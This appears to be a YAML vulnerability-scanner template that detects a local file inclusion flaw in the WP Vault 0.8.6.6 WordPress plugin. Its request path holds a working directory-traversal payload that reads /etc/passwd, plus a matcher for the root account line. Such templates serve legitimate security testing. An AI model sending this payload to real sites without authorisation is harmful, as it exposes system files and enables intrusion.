25 lines
508 B
YAML
25 lines
508 B
YAML
id: wp-vault-local-file-inclusion
|
||
|
||
info:
|
||
name: WP Vault 0.8.6.6 – Local File Inclusion
|
||
author: 0x_Akoko
|
||
severity: high
|
||
reference: https://www.exploit-db.com/exploits/40850
|
||
tags: wp-plugin,wordpress,lfi
|
||
|
||
requests:
|
||
- method: GET
|
||
path:
|
||
- "{{BaseURL}}/?wpv-image=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd"
|
||
|
||
matchers-condition: and
|
||
matchers:
|
||
|
||
- type: regex
|
||
regex:
|
||
- "root:[x*]:0:0"
|
||
|
||
- type: status
|
||
status:
|
||
- 200
|